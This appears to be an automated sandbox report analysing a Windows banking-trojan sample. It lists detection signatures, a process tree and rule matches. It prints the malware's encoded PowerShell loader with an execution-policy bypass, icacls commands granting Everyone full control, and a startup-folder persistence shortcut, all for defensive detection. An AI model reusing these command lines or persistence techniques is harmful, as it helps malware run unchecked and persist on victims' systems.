Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PVKDyWHOaX.exe

Overview

General Information

Sample name:PVKDyWHOaX.exe
renamed because original name is a hash value
Original sample name:07b5b4156d1f3adbb7728ba7a7d538af04e7cca8e396a19f5446bb2043a6e3db.exe
Analysis ID:1578839
MD5:79ab86017b2c9b713d6af08086b1937f
SHA1:4214a09a7a12b341b9b5290b448e2a321a1f4566
SHA256:07b5b4156d1f3adbb7728ba7a7d538af04e7cca8e396a19f5446bb2043a6e3db
Tags:bankerexelatamPAGAMENTOS-DIGITAIS-LTDAtrojanuser-johnk3r
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:48
Range:0 - 100

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains very large strings
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • PVKDyWHOaX.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\PVKDyWHOaX.exe" MD5: 79AB86017B2C9B713D6AF08086B1937F)
    • powershell.exe (PID: 348 cmdline: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 7100 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-75619 /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • WmiPrvSE.exe (PID: 1672 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • icacls.exe (PID: 7464 cmdline: "C:\Windows\system32\icacls.exe" C:\Nvidia-75619\Nvidia-75619.exe /grant Everyone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • Nvidia-75619.exe (PID: 7488 cmdline: "C:\Nvidia-75619\Nvidia-75619.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
  • svchost.exe (PID: 2952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Nvidia-75619.exe (PID: 7732 cmdline: "C:\Nvidia-75619\Nvidia-75619.exe" MD5: D11828146FF9E2E340C555F9531CAC47)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 348INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x8e05a:$b2: ::FromBase64String(
  • 0x8e581:$b2: ::FromBase64String(
  • 0x8e93f:$b2: ::FromBase64String(
  • 0x8ee2f:$b2: ::FromBase64String(
  • 0x8ef83:$b2: ::FromBase64String(
  • 0x8f34a:$b2: ::FromBase64String(
  • 0x8f455:$b2: ::FromBase64String(
  • 0x8fcef:$b2: ::FromBase64String(
  • 0x8ff0e:$b2: ::FromBase64String(
  • 0x9078f:$b2: ::FromBase64String(
  • 0xbf98c:$b2: ::FromBase64String(
  • 0xbf9e0:$b2: ::FromBase64String(
  • 0xebd37:$b2: ::FromBase64String(
  • 0xebe38:$b2: ::FromBase64String(
  • 0xebf66:$b2: ::FromBase64String(
  • 0xec08f:$b2: ::FromBase64String(
  • 0xec1b9:$b2: ::FromBase64String(
  • 0xec2a7:$b2: ::FromBase64String(
  • 0xec3d6:$b2: ::FromBase64String(
  • 0xec468:$b2: ::FromBase64String(
  • 0xec591:$b2: ::FromBase64String(
SourceRuleDescriptionAuthorStrings
amsi64_348.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x306:$b2: ::FromBase64String(
  • 0x409:$b2: ::FromBase64String(
  • 0x538:$b2: ::FromBase64String(
  • 0x662:$b2: ::FromBase64String(
  • 0x78d:$b2: ::FromBase64String(
  • 0x87c:$b2: ::FromBase64String(
  • 0x9af:$b2: ::FromBase64String(
  • 0xa42:$b2: ::FromBase64String(
  • 0xb6d:$b2: ::FromBase64String(
  • 0xce5:$b2: ::FromBase64String(
  • 0xe5a:$b2: ::FromBase64String(
  • 0x110f:$b2: ::FromBase64String(
  • 0x131a:$b2: ::FromBase64String(
  • 0x1532:$b2: ::FromBase64String(
  • 0x1707:$b2: ::FromBase64String(
  • 0x1888:$b2: ::FromBase64String(
  • 0x1981:$b2: ::FromBase64String(
  • 0x19d5:$b2: ::FromBase64String(
  • 0x1beb:$b2: ::FromBase64String(
  • 0x1d46:$b2: ::FromBase64String(
  • 0x2086:$b2: ::FromBase64String(

System Summary

barindex
Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 348, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-75619.lnk
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARg
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARg
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARg
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 348, TargetFilename: C:\Nvidia-75619\play.exe
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 348, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-75619.lnk
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand 